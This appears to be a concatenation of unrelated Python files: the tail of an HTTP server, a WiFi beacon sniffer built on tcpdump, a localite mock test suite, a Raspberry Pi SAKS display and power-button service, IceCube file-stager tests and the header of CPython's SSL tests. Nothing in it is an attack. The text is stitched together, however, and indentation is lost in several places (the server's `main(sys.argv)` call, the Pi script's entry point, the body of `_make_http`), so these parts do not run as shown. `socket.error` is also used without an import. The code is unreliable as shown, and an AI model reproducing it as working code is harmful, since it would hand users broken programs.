            except ssl.SSLError as e:
                Logger.warn(f'Could not serve HTTPS due to SSL error: {str(e)}')
                Logger.warn('Skipping...')
                continue
        thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
        thread.start()
        Logger.ok('Serving HTTP server on: ("{}", {})'.format(
            config['listen'], port)
        )
    try:
        Logger.info('Entering infinite serving loop.')
        while True:
            # BUG FIX: the original `while True: pass` busy-wait pinned a full
            # CPU core while idle; sleeping is equivalent and Ctrl+C still
            # interrupts it.
            time.sleep(1)
    except KeyboardInterrupt:
        pass
if __name__ == '__main__':
main(sys.argv)
|
WiFiDevice.py | # Copyright (c) 2019, the rf_sensor authors (see AUTHORS.txt)
# Licensed under the BSD 3-clause license (see LICENSE.txt)
#!/usr/bin/env python3
#****************************************************
# Class for manipulating wifi interfaces
# Input:
# -i, iface: wireless interface name
# -c, channels: channels to survey
# -f, filter: filter applied to received packets
# Variables:
# self.tcpdump_process is the process acquiring tcpdump data
# to read use self.tcpdumpo_process.stdout.readline()
#****************************************************
#from __future__ import print_function
import sys, os
import subprocess, multiprocessing
import datetime, time
import numpy as np
def execute_retry(cmd, max_counter = 10):
    """Run *cmd* through the shell, retrying on failure.

    Prints progress for each failed attempt; gives up after the command has
    failed max_counter + 1 times. Returns 0 on success, 1 on abort.
    """
    print("{:40s} ".format(cmd))
    for attempt in range(1, max_counter + 2):
        if os.system(cmd) == 0:
            print("OK")
            return 0
        print("\n[{:02d}/{:02d}] {:s} Failed".format(attempt, max_counter, cmd))
    print('\n[Error] Max trial reached')
    return 1
class WiFiDevice:
    """
    Base class to listen wireless devices
    Parameters:
    iface: (string) wireless interface name. Check available interfaces and their names using `iwconfig`
    channels: (list of ints) channels to listen (1-11)
    chopper_ts: (int/float) sampling time in seconds for channel hopper to go through all channels. If ts:1s and there are 2 channels, each channel gets 0.5s
    filter: (string) filters for tcpdump. default: Beacon, listens only to beacon frames.
    ts: (int/float) sampling time in seconds for sample functions
    Functions:
    chopper_start:
    starts channel hopping if desired
    tcpdump_start:
    starts wifi data aquisition
    read_start:
    starts tcpdump_start,
    extracts main information and stores it in data array
    sample:
    starts read_start
    clears data every specified sampling time
    *_alive:
    * is chopper/tcpdump/read/sample
    checks if process has started
    terminate:
    ends all processes
    """
    def __init__(self,**kwargs):
        self.iface = kwargs.get('iface','wlp5s0')
        self.channels = kwargs.get('channels', (1,6,11))
        self.chopper_ts = kwargs.get('channel_hopper_sampling_time',1.0)
        self.filter = kwargs.get('filter','Beacon')
        self.ts = kwargs.get('sampling_time',self.chopper_ts)
        self.data = kwargs.get('data',None)
        # variables
        # Manager list so the decode subprocess can append across processes.
        if self.data is None: self.data = multiprocessing.Manager().list()
        # filters
        # 'Beacon' is shorthand for the tcpdump 802.11 beacon-frame filter.
        if self.filter == 'Beacon': self.filter = ' type mgt subtype beacon'
        # processes
        self.chopper_process = None
        self.tcpdump_process = None
        self.read_process = None
        self.sample_process = None
        if self.init_device() == 0: print('\nDevice Initialized')
        else: print('[Error] Device initialization failed')
    def init_device(self):
        """Reset the interface, switch it to monitor mode and tune to the first channel.

        Returns 0 on success, 1 if any step keeps failing.
        NOTE(review): iface/channel values are interpolated into shell commands
        via os.system — safe only for trusted, caller-controlled values.
        """
        # turn the interface on/off to reset
        if execute_retry("sudo -S ifconfig {:s} down".format(self.iface)) != 0 : return 1
        if execute_retry("sudo -S ifconfig {:s} up".format(self.iface)) != 0 : return 1
        # change interface to monitor mode (off -> monitor mode -> on)
        if execute_retry("sudo -S ifconfig {:s} down".format(self.iface)) != 0 : return 1
        if execute_retry("sudo -S iwconfig {:s} mode monitor".format(self.iface)) != 0 : return 1
        if execute_retry("sudo -S ifconfig {:s} up".format(self.iface)) != 0 : return 1
        # set interface to first channel in channels
        if execute_retry("sudo -S iwconfig {:s} channel {:d}".format(self.iface,self.channels[0])) != 0 : return 1
        return 0
    # Channel Hopping
    ## public functions
    def chopper_start(self):
        """Start (or restart) the channel-hopper subprocess. Always returns 0."""
        #self.cmd = "rosrun rf_sensor channel_hopper.py -i {} -t {} -ch {}".format(self.iface,1.*self.chopper_ts," ".join(str(ch) for ch in self.channels))
        if self.chopper_process is not None: self.chopper_process.terminate()
        try:
            self.chopper_process = multiprocessing.Process(target=self.__chopper)
            self.chopper_process.start()
        except:
            print('[Error] multiprocessing.Process(chopper_run) failed')
        print('Channel Hopper Initialized')
        return 0
    def chopper_alive(self):
        # False both when never started (None) and when dead.
        try: return self.chopper_process.is_alive()
        except: return False
    ## private function
    def __chopper(self):
        """Cycle through self.channels forever, dwelling chopper_ts/len(channels) each."""
        ts = 1.0*self.chopper_ts/len(self.channels)
        ret = 0
        # Loop ends only if a channel switch fails (non-zero os.system status).
        while(not ret):
            for ch in self.channels:
                ret = os.system("sudo -S iwconfig {:s} channel {:d}".format(self.iface,ch))
                if ret != 0 : print('[Error] Channel hopper could not change channel. Are you running as sudo?')
                time.sleep(ts)
    # tcpdump wrapper
    ## public functions
    def tcpdump_start(self):
        """
        iface must be initialized before with init(iface)
        Spawns tcpdump as a child process; read frames from
        self.tcpdump_process.stdout. Always returns 0.
        """
        cmd = 'sudo -S tcpdump -i {:s} -ne --time-stamp-precision=micro -l --immediate-mode {:s}'.format(self.iface,self.filter)
        self.tcpdump_process = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE)
        print('tcpdump process initialized')
        return 0
    def tcpdump_alive(self):
        # poll() is None while the child process is still running.
        try: return self.tcpdump_process.poll() is None
        except: return False
    # WiFi data decoding
    ## public functions
    def read_start(self):
        """
        continuously decodes incomming tcpdump messages and publishes to data list
        """
        if self.tcpdump_alive() is False: self.tcpdump_start()
        self.read_process = multiprocessing.Process(target=self.__decode)
        self.read_process.start()
        print('RSS messages stored at data')
        return 0
    def read(self):
        """
        outputs last message only
        """
        if self.tcpdump_alive() is False : self.tcpdump_start()
        print(self.tcpdump_process.stdout.readline())
    def read_alive(self):
        try: return self.read_process.is_alive() is True
        except: return False
    ## private function
    def __decode(self,verbose=False):
        """
        decodes tcpdump message to data list
        Each complete record appended to self.data is
        [utc timestamp, freq (MHz), BSSID, np.array of dBm RSS values].
        """
        while True:
            rss_data = list()
            # s is a completeness score: +10 for freq, +10 for BSSID, +1 per RSS value.
            s = 0
            try:
                tmp = self.tcpdump_process.stdout.readline()
                tmp = tmp.split()
                for i in range(len(tmp)):
                    if b'MHz' in tmp[i]: freq = int(tmp[i-1]); s+=10
                    if b'dBm' in tmp[i]: rss_data.append(int(tmp[i].split(b'dBm')[0])); s+=1
                    if b'BSSID' in tmp[i]: mac = tmp[i].split(b'BSSID:')[1]; s+=10
                if verbose: print(s)
                # s>=21 implies freq, BSSID and at least one RSS value were all seen,
                # so freq/mac are guaranteed bound here.
                if s>=21:
                    self.data.append(list([datetime.datetime.utcnow(), freq, mac, np.asarray(rss_data)]))
                    if verbose: print(self.data[-1])
                else: print('Incomplete rss msg')
            except:
                print('[Error] Could not decode rss data')
            time.sleep(1/500.) #refresh at 500Hz
    # samples at a fixed sampling time (ts)
    ## public functions
    def sample(self):
        """Start the periodic data-clearing subprocess (starts reading first). Returns 0."""
        if self.read_alive() is False : self.read_start()
        try:
            self.sample_process = multiprocessing.Process(target=self.__sample)
            self.sample_process.start()
        except:
            print('[Error] multiprocessing.Process(sample_process) failed')
        print('Sampling every {:f} s'.format(self.ts))
        return 0
    def sample_alive(self):
        try: return self.sample_process.is_alive()
        except: return False
    ## private function
    def __sample(self):
        # Clear the shared buffer every self.ts seconds so consumers see
        # only the most recent window of messages.
        while True:
            time.sleep(self.ts)
            self.data[:] = []
    def terminate(self):
        """Stop every child process; tcpdump (run via sudo) needs an external kill."""
        print('Terminating Processes')
        if self.sample_alive() is True: print('Terminating sample'); self.sample_process.terminate()
        if self.read_alive() is True: print('Terminating read'); self.read_process.terminate()
        if self.chopper_alive() is True: print('Terminating chopper'); self.chopper_process.terminate()
        if self.tcpdump_alive() is True:
            print('Terminating tcpdump')
            # terminate() can't signal the root-owned tcpdump; use sudo kill.
            cmd = "sudo kill -9 {:d}".format(self.tcpdump_process.pid)
            os.system(cmd)
            if self.tcpdump_alive() is True:
                print("Could not kill the process, please try")
                print("   ",cmd)
|
test_mock.py | from localite.flow.mock import append, Queue, mocked_settings
from localite.flow.mock import create_response as cr
import threading
import time
from subprocess import Popen, PIPE
import pytest
from os import environ
def test_message_queue():
    """Appender should fill the bounded queue up to its maxsize and no further."""
    outqueue = Queue(maxsize=7)
    is_running = threading.Event()
    # append() presumably pushes one item per 0.1 s while is_running is set
    # — TODO confirm against localite.flow.mock.append.
    appender = threading.Thread(target=append, args=(outqueue, is_running, 0.1))
    appender.start()
    is_running.set()
    time.sleep(2)
    is_running.clear()
    # 2 s at 0.1 s/item would exceed 7 items; maxsize caps unfinished_tasks.
    assert outqueue.unfinished_tasks == 7
def test_cli():
    """Launching `localite-mock` and then `localite-mock --kill` shuts it down cleanly."""
    p = Popen(["localite-mock"], env=environ, stderr=PIPE, stdout=PIPE)
    time.sleep(1)  # give the mock time to start listening
    Popen(["localite-mock", "--kill"])
    time.sleep(1)  # give the kill command time to take effect
    o, e = p.communicate()
    assert b"Shutting MOCK down" in o
def test_create_response():
    """Exercise create_response() over valid, invalid and unknown message keys."""
    # No message -> no response.
    assert cr(None) == None
    assert "error" in cr({"current_instrument": "GARBAGE"}).keys()
    assert "NONE" in cr({"current_instrument": "NONE"}).values()
    # Target index: valid value is echoed; out-of-range/non-int gives a reason.
    assert 1 in cr({"coil_0_target_index": 1}).values()
    assert "reason" in cr({"coil_0_target_index": -1}).keys()
    assert "reason" in cr({"coil_0_target_index": "T"}).keys()
    # Pulses: only COIL_0 is mocked.
    assert "coil_0_didt" in cr({"single_pulse": "COIL_0"}).keys()
    assert "error" in cr({"single_pulse": "COIL_2"}).keys()
    assert 1 in cr({"coil_0_amplitude": 1}).values()
    assert "error" in cr({"coil_0_amplitude": -1}).keys()
    # MEP responses: well-formed dict is echoed, implausible fields error out.
    rsp = {"mepmaxtime": 18, "mepamplitude": 50, "mepmin": -25, "mepmax": 25}
    assert rsp in cr({"coil_0_response": rsp}).values()
    bad = {"mepmaxtime": -99999, "mepamplitude": 50, "mepmin": -25, "mepmax": 25}
    assert "error" in cr({"coil_0_response": bad}).keys()
    bad = {"mepmaxtime": 18, "mepamplitude": -99999, "mepmin": -25, "mepmax": 25}
    assert "error" in cr({"coil_0_response": bad}).keys()
    # Unknown keys and unknown get-targets both error.
    assert "error" in cr({"bad": "bad"}).keys()
    assert "error" in cr({"get": "bad"}).keys()
# One parametrized case per mocked setting: `get` must echo the stored value.
prms = [(k, v) for k, v in mocked_settings.items()]
@pytest.mark.parametrize("k, v", prms)
def test_get_response(k, v):
    assert cr({"get": k})[k] == v
|
RPI_SAKS_service.py | #!/usr/bin/env python
# coding=utf-8
#
import RPi.GPIO as GPIO
import time
import threading
import os, sys
import string
# Use BCM pin numbering
GPIO.setmode(GPIO.BCM)
# Discrete LEDs
LED_D1 = 5
LED_D2 = 6
LED_D3 = 13
LED_D4 = 19
LED_D5 = 0
LED_D6 = 1
LED_D7 = 7
LED_D8 = 8
# Buzzer
BUZZER_B1 = 11
# Push buttons
KEY_K1 = 23
KEY_K2 = 18
KEY_K3 = 24
KEY_K4 = 25
# 7-segment display segment lines (note: some pins are shared with LEDs above)
LED_A = 21
LED_B = 16
LED_C = 19
LED_D = 6
LED_E = 5
LED_F = 20
LED_G = 26
LED_DP = 13
# 7-segment display digit-select (common) lines
LED_COM1 = 17
LED_COM2 = 27
LED_COM3 = 22
LED_COM4 = 10
# Infrared transmitter / receiver
IR_LED = 12
IR_RECEIVER = 9
# 1-wire temperature sensor
DS18B20 = 4
# Serial / I2C pins
UART_TXD = 14
UART_RXD = 15
IC2_SDA = 2
IC2_SLC = 3
# Preset variables
LED_OFF = -1 # sentinel: digit position switched off
# Display buffers, one dict per display mode (selected by K3/K4):
# keys 0-3 are digit values per position, 'p0'-'p3' toggle the decimal points.
NUM = [{0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:1, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
       {0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:2, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
       {0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:3, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
       {0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:4, 'p0':False, 'p1':False, 'p2':False, 'p3':False}]
def init():
    """Configure all GPIO pins used by the service (buttons in, LEDs/display out)."""
    # Power button and its two indicator LEDs
    GPIO.setup(KEY_K1, GPIO.IN, pull_up_down = GPIO.PUD_UP)
    GPIO.setup(LED_D7, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_D8, GPIO.OUT, initial = GPIO.HIGH)
    # Display-mode selector switches
    GPIO.setup(KEY_K3, GPIO.IN, pull_up_down = GPIO.PUD_UP)
    GPIO.setup(KEY_K4, GPIO.IN, pull_up_down = GPIO.PUD_UP)
    # 7-segment digit-select (common) lines, idle HIGH (inactive)
    GPIO.setup(LED_COM1, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_COM2, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_COM3, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_COM4, GPIO.OUT, initial = GPIO.HIGH)
    # 7-segment segment lines, idle HIGH (segments off — active low)
    GPIO.setup(LED_A, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_B, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_C, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_D, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_E, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_F, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_G, GPIO.OUT, initial = GPIO.HIGH)
    GPIO.setup(LED_DP, GPIO.OUT, initial = GPIO.HIGH)
def deinit():
    """Release all GPIO pins claimed by init()."""
    GPIO.cleanup()
# Power-button click handler (GPIO edge callback).
# Click sequence: 1 = arm, 2 = schedule reboot, 3 = schedule halt, 4 = cancel.
def powerButtonClick(channel):
    global powerButtonClickTimes, powerCountDown
    powerButtonClickTimes += 1
    # Armed: wait for a confirming click
    if powerButtonClickTimes == 1:
        print "If you really want to reboot or shut down please continue click!"
        powerCountDown = 3
    # Reboot mode (LED D7 lit)
    if powerButtonClickTimes == 2:
        GPIO.output(LED_D7, GPIO.LOW)
        GPIO.output(LED_D8, GPIO.HIGH)
        print "System will restart in 10s!"
        powerCountDown = 10
    # Halt mode (LED D8 lit)
    if powerButtonClickTimes == 3:
        GPIO.output(LED_D7, GPIO.HIGH)
        GPIO.output(LED_D8, GPIO.LOW)
        print "System will halt in 10s!"
        powerCountDown = 10
    # Fourth click cancels everything and resets the state
    if powerButtonClickTimes == 4:
        GPIO.output(LED_D7, GPIO.HIGH)
        GPIO.output(LED_D8, GPIO.HIGH)
        print "Cancel"
        powerButtonClickTimes = 0
        powerCountDown = 10
# Power-button service loop: counts down the action armed by powerButtonClick()
# and executes it (cancel / reboot / halt) when the countdown reaches zero.
def powerButton():
    global powerButtonClickTimes, powerCountDown
    powerButtonClickTimes = 0
    powerCountDown = 10
    while True:
        # Armed but not confirmed -> auto-cancel
        if powerButtonClickTimes == 1 and powerCountDown == 0:
            print "Cancel"
            powerButtonClickTimes = 0
        # Reboot mode
        if powerButtonClickTimes == 2 and powerCountDown == 0:
            print "Reboot"
            os.system("reboot")
            sys.exit()
        # Halt mode
        if powerButtonClickTimes == 3 and powerCountDown == 0:
            print "Halt"
            os.system("halt")
            sys.exit()
        # While any mode is active, tick down once per second;
        # otherwise poll cheaply at 5 Hz.
        if powerButtonClickTimes == 1 or powerButtonClickTimes == 2 or powerButtonClickTimes == 3:
            print powerCountDown
            powerCountDown -= 1
            time.sleep(1)
        else:
            time.sleep(0.2)
# 7-segment segment-select: which segment pins go LOW (lit) for each digit.
# Replaces the original 60-line if-chain with a lookup table — one entry per
# digit, identical pin writes in the same order.
_SEGMENTS_BY_DIGIT = {
    0: (LED_A, LED_B, LED_C, LED_D, LED_E, LED_F),
    1: (LED_B, LED_C),
    2: (LED_A, LED_B, LED_D, LED_E, LED_G),
    3: (LED_A, LED_B, LED_C, LED_D, LED_G),
    4: (LED_B, LED_C, LED_F, LED_G),
    5: (LED_A, LED_C, LED_D, LED_F, LED_G),
    6: (LED_A, LED_C, LED_D, LED_E, LED_F, LED_G),
    7: (LED_A, LED_B, LED_C),
    8: (LED_A, LED_B, LED_C, LED_D, LED_E, LED_F, LED_G),
    9: (LED_A, LED_B, LED_C, LED_D, LED_F, LED_G),
}

def setWE(n, p):
    """Drive the segment lines for digit *n* (LED_OFF blanks the digit).

    n: digit 0-9, or LED_OFF (-1) / any unknown value to leave all segments dark.
    p: True lights the decimal point.
    Segments are active-low: HIGH = off, LOW = lit.
    """
    # Blank every segment first, exactly as the original did.
    for pin in (LED_A, LED_B, LED_C, LED_D, LED_E, LED_F, LED_G, LED_DP):
        GPIO.output(pin, GPIO.HIGH)
    if p:
        GPIO.output(LED_DP, GPIO.LOW)
    # Unknown digits (including LED_OFF) simply light nothing.
    for pin in _SEGMENTS_BY_DIGIT.get(n, ()):
        GPIO.output(pin, GPIO.LOW)
# 7-segment digit-select: pull exactly one common line LOW (active) for
# position n (0-3); any other value deselects all digits.
def setP0(n):
    commons = (LED_COM1, LED_COM2, LED_COM3, LED_COM4)
    # Deselect every digit first, then activate the requested one.
    for pin in commons:
        GPIO.output(pin, GPIO.HIGH)
    for idx, pin in enumerate(commons):
        if n == idx:
            GPIO.output(pin, GPIO.LOW)
# Display multiplexing service: scans the four digits at ~250 Hz, rendering
# the NUM buffer selected by the K3/K4 mode switches.
def show():
    i = 0
    while True:
        # Mode selection: K3/K4 are pulled up, so pressed == LOW (False).
        # K3 high: mode 0 (K4 high) or 1 (K4 low); K3 low: mode 2 or 3.
        if GPIO.input(KEY_K3):
            if GPIO.input(KEY_K4):
                mode = 0
            else:
                mode = 1
        else:
            if GPIO.input(KEY_K4):
                mode = 2
            else:
                mode = 3
        # Light one digit position per pass (persistence of vision).
        if i == 0:
            setP0(i)
            setWE(NUM[mode][0], NUM[mode]['p0'])
        if i == 1:
            setP0(i)
            setWE(NUM[mode][1], NUM[mode]['p1'])
        if i == 2:
            setP0(i)
            setWE(NUM[mode][2], NUM[mode]['p2'])
        if i == 3:
            setP0(i)
            setWE(NUM[mode][3], NUM[mode]['p3'])
            i = -1  # wrap back to digit 0 on the next increment
        time.sleep(0.004)
        i = i + 1
# Clock service: writes HH:MM into display mode 0 and blinks the middle
# decimal point once per second.
def getTime():
    lastSec = 0
    while True:
        localtime = time.localtime(time.time())
        # Split hour/minute into tens and units digits.
        # (Python 2 integer division — the numerator is already a multiple of 10.)
        NUM[0][1] = localtime.tm_hour % 10
        NUM[0][0] = (localtime.tm_hour - NUM[0][1]) / 10
        NUM[0][3] = localtime.tm_min % 10
        NUM[0][2] = (localtime.tm_min - NUM[0][3]) /10
        if lastSec == localtime.tm_sec:
            time.sleep(0.02)
        else:
            # New second: flash the colon-style decimal point for 0.35 s.
            NUM[0]['p1'] = True
            lastSec = localtime.tm_sec
            time.sleep(0.35)
            NUM[0]['p1'] = False
# CPU-temperature service: polls `vcgencmd measure_temp` twice a second and
# writes the value (in tenths of a degree, e.g. 47.2 -> digits 4,7,2 with a
# decimal point after the second digit) into display mode 1.
def getCPUTemp():
    while True:
        ts = os.popen('vcgencmd measure_temp').readline()
        # string.atof is Python 2 only; output looks like "temp=47.2'C\n".
        t = string.atof(ts.replace("temp=","").replace("'C\n",""))
        t = t * 10
        # NOTE(review): t is a float here, so the stored digits are floats;
        # setWE's == comparison still matches them against int digit keys.
        NUM[1][3] = t % 10
        t = (t - NUM[1][3]) / 10
        NUM[1][2] = t % 10
        t = (t - NUM[1][2]) / 10
        NUM[1][1] = t % 10
        NUM[1]['p2'] = True
        time.sleep(0.5)
def main():
    """Start all daemon service threads and block on the interactive prompt."""
    # Power-button service thread + GPIO edge callback
    powerButtonThread = threading.Thread(target = powerButton)
    powerButtonThread.setDaemon(True)
    powerButtonThread.start()
    GPIO.add_event_detect(KEY_K1, GPIO.RISING, callback = powerButtonClick, bouncetime = 200) # register power-button listener
    # Clock refresh thread
    getTimeThread = threading.Thread(target = getTime)
    getTimeThread.setDaemon(True)
    getTimeThread.start()
    # CPU-temperature refresh thread
    getCPUTempThread = threading.Thread(target = getCPUTemp)
    getCPUTempThread.setDaemon(True)
    getCPUTempThread.start()
    # Display multiplexing thread
    showThread = threading.Thread(target = show)
    showThread.setDaemon(True)
    showThread.start()
    print "You can press Ctrl+c or input \"exit\" to close this service!"
    try:
        while True:
            usrCmd = raw_input(">")
            if usrCmd == "exit":
                return
    except KeyboardInterrupt:
        print "User press Ctrl+c, exit!"
if __name__ == "__main__":
init()
main()
deinit()
|
test_filestager.py | #!/usr/bin/env python
import sys
if sys.version_info[:2] < (2,6):
sys.exit(0)
from icecube import dataio
from icecube.dataio.I3FileStagerFile import I3FileStagerFile
from icecube import icetray
import os
# icetray.logging.I3Logger.global_logger = icetray.I3NullLogger()
icetray.logging.set_level('TRACE')
dataio.set_local_scratch_dir('.')
def test_scratchdir(url=os.path.expandvars("file://$I3_BUILD/env-shell.sh")):
    """Scratch directory is created lazily on first stage and removed on destruction."""
    stager = I3FileStagerFile()
    # directory is created lazily
    scratch_dir = stager.scratch_dir
    assert(scratch_dir is None)
    # now it should exist
    stager.GetReadablePath(url)
    scratch_dir = stager.scratch_dir
    assert(os.path.isdir(scratch_dir))
    del stager
    # now it should be gone
    assert(not os.path.isdir(scratch_dir))
def _test_stage(url, minsize=100):
    """Stage *url* and check the local copy exists, is non-trivial, and is cleaned up.

    minsize guards against staging an empty/error body as success.
    """
    import ssl
    if 'https' in url:
        # TODO: Make the actual cacert work.
        # It just seems to hang when using this line.
        #stager = I3FileStagerFile(ssl={'cafile':'cacert.pem','capath':os.getcwd()})
        try:
            # accept self-signed certs
            stager = I3FileStagerFile(ssl={'context':ssl._create_unverified_context()})
        except AttributeError:
            # Older Pythons have no _create_unverified_context
            stager = I3FileStagerFile()
    else:
        stager = I3FileStagerFile()
    local_fname = stager.GetReadablePath(url)
    assert(os.path.exists(str(local_fname)))
    assert(os.stat(str(local_fname)).st_size > minsize)
    # Rebinding to str drops the staging handle, triggering cleanup.
    local_fname = str(local_fname)
    # check that staged files are really deleted
    if stager.CanStageIn(url):
        assert(not os.path.exists(str(local_fname)))
def _make_http(port=None,usessl=False,basic_auth=False):
try:
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
except ImportError:
from http.server import BaseHTTPRequestHandler,HTTPServer
import random
import ssl
import threading
import subprocess
data = b''.join([b'test' for _ in range(1000)])
if basic_auth:
class Handle(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type','text')
self.end_headers()
def do_AUTHHEAD(self):
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type','text')
self.end_headers()
def do_GET(self):
if self.headers['Authorization'] == None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
elif self.headers['Authorization'] == 'Basic dGVzdDp0ZXN0':
self.do_HEAD()
self.wfile.write(bytearray(self.headers['Authorization'],'ascii'))
self.wfile.write(data)
else:
self.do_AUTHHEAD()
self.wfile.write(self.headers['Authorization'])
self.wfile.write('not authenticated')
else:
class Handle(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type','text')
self.end_headers()
def do_GET(self):
self.do_HEAD()
self.wfile.write(data)
if not port:
while True:
try:
port = random.randint(10000,50000)
httpd = HTTPServer(('localhost', port), Handle)
except socket.error:
continue
break
else:
httpd = HTTPServer(('localhost', port), Handle)
if usessl:
print('ssl')
p = subprocess.Popen(['openssl','req','-new','-x509',
'-keyout','privkey.pem',
'-out','cacert.pem','-days','1',
'-batch','-passout','pass:passkey',
'-subj', '/'],
stdin=subprocess.PIPE)
p.communicate(input=b'passkey')
if p.returncode:
raise Exception('cannot generate self-signed cert')
try:
if subprocess.call(['openssl','rsa','-in','privkey.pem','-out','key.pem','-passin','pass:passkey']):
raise Exception('error removing password from key.pem')
open('key.pem','a').write(open('cacert.pem').read())
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='key.pem',
server_side=True)
except Exception:
os.remove('privkey.pem')
os.remove('cacert.pem')
if os.path.exists('key.pem'):
os.remove('key.pem')
raise
t = threading.Thread(target=httpd.serve_forever)
t.start()
def shutdown():
httpd.shutdown()
t.join()
if os.path.exists('privkey.pem'):
os.remove('privkey.pem')
if os.path.exists('key.pem'):
os.remove('key.pem')
if os.path.exists('cacert.pem'):
os.remove('cacert.pem')
return port,shutdown
def test_double_stage():
    """
    Stager should download files only once and return a handle to the existing
    file if it's still live
    """
    port,stop = _make_http()
    url = "http://localhost:%d"%port
    try:
        stager = I3FileStagerFile()
        f1 = stager.GetReadablePath(url)
        f2 = stager.GetReadablePath(url)
        # Same URL -> same cached local file for both handles.
        assert(str(f1) == str(f2))
        assert(os.path.exists(str(f1)))
        assert(os.path.exists(str(f2)))
        del f1
        # File survives while any handle is alive...
        assert(os.path.exists(str(f2)))
        f2path = str(f2)
        del f2
        # ...and is deleted when the last handle goes away.
        assert(not os.path.exists(f2path))
    finally:
        stop()
def test_http():
    """Stage a plain-HTTP URL from a local throwaway server."""
    port,stop = _make_http()
    address = "http://localhost:%d"%port
    try:
        _test_stage(address)
    finally:
        stop()
def test_http_with_auth():
    """Stage an HTTP URL that carries inline Basic-auth credentials."""
    port,stop = _make_http(basic_auth=True)
    address = "http://test:test@localhost:%d"%port
    try:
        _test_stage(address)
    finally:
        stop()
def test_https():
    """Stage an HTTPS URL served with a self-signed certificate."""
    port,stop = _make_http(usessl=True)
    address = "https://localhost:%d"%port
    try:
        _test_stage(address)
    finally:
        stop()
def test_https_with_auth():
    """Stage an HTTPS URL with Basic-auth credentials and a self-signed cert."""
    port,stop = _make_http(usessl=True,basic_auth=True)
    address = "https://test:test@localhost:%d"%port
    try:
        _test_stage(address)
    finally:
        stop()
def test_file():
    """Stage an explicit file:// URL with an absolute path."""
    _test_stage(os.path.expandvars("file://$I3_BUILD/env-shell.sh"))
def test_file_with_relative_path():
    """file:// URLs with relative paths must be rejected with RuntimeError."""
    relative = os.path.relpath(os.path.expandvars('$I3_BUILD/env-shell.sh'))
    try:
        _test_stage('file://'+relative)
        raise AssertionError("An error should have been raised")
    except RuntimeError:
        pass
def test_file_implicit():
    """A bare absolute path (no scheme) is treated as a local file."""
    _test_stage(os.path.expandvars("$I3_BUILD/env-shell.sh"))
if __name__ == "__main__":
    # Run every module-level test* callable when executed directly
    # (list() because the loop adds names to locals while iterating).
    for k, v in list(locals().items()):
        if k.startswith("test") and hasattr(v, "__call__"):
            v()
|
test_ssl.py | # -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
from test.script_helper import assert_python_ok
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import shutil
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
    """Return the path of a test-data file living next to this module."""
    here = os.path.dirname(__file__)
    return os.path.join(here, *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
